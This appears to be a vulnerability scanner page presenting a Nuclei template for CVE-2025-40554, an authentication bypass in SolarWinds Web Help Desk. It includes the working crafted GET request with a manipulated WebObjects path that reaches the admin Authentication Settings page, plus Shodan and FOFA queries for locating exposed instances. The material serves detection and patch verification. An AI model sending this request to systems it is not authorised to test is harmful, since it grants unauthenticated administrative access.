SolarWinds Web Help Desk - Authentication Bypass
CVE-2025-40554
Early Release
Description
SolarWinds Web Help Desk 12.8.8 HF1 and earlier contains an authentication bypass vulnerability in the WebObjects session handling. By crafting a request with a manipulated path component to an internal admin page endpoint, an unauthenticated attacker can access privileged administrative functions including authentication configuration settings, SAML/CAS setup, and API key management.
Severity
Critical
CVSS Score
9.8
Exploit Probability
0%
Affected Product
web_help_desk
Published Date
February 16, 2026
Template Author
bushi-gg
CVE-2025-40554.yaml
id: CVE-2025-40554
info:
name: SolarWinds Web Help Desk - Authentication Bypass
author: Bushi-gg
severity: critical
description: |
SolarWinds Web Help Desk 12.8.8 HF1 and earlier contains an authentication bypass vulnerability in the WebObjects session handling. By crafting a request with a manipulated path component to an internal admin page endpoint, an unauthenticated attacker can access privileged administrative functions including authentication configuration settings, SAML/CAS setup, and API key management.
impact: |
An attacker can bypass authentication and access administrative configuration pages, potentially leading to full system compromise through authentication method manipulation.
remediation: |
Update to Web Help Desk version 2026.1 or later.
reference:
- https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40554
- https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm
- https://www.rapid7.com/blog/post/etr-multiple-critical-solarwinds-web-help-desk-vulnerabilities-cve-2025-40551-40552-40553-40554/
- https://nvd.nist.gov/vuln/detail/CVE-2025-40554
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-40554
epss-score: 0.00043
epss-percentile: 0.12991
cwe-id: CWE-1390
metadata:
verified: true
max-request: 2
shodan-query: http.favicon.hash:"1895809524"
fofa-query: icon_hash="1895809524"
product: web_help_desk
vendor: solarwinds
tags: cve,cve2025,solarwinds,whd,auth-bypass,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
internal: true
- raw:
- |
GET /helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AAAAAAAAAAAAAAAAAAAAAA/1.0?badparam=/ajax/&wopage=LoginPref HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "externalAuthContainer", "Authentication Settings", "admin_pswd")'
condition: and
# digest: 4a0a00473045022100c9a5ad5b54f20fa31ec8e8d3dba042069fce5121ba117ac133b175667485772c022016fe5f48d4d8c8902eade526a2d63520b7d9bd4c799bc317daf144a28771129a:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2025-40554
CWE ID:
cwe-1390
References
https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40554https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htmhttps://www.rapid7.com/blog/post/etr-multiple-critical-solarwinds-web-help-desk-vulnerabilities-cve-2025-40551-40552-40553-40554/https://nvd.nist.gov/vuln/detail/CVE-2025-40554
Remediation Steps
Update to Web Help Desk version 2026.1 or later.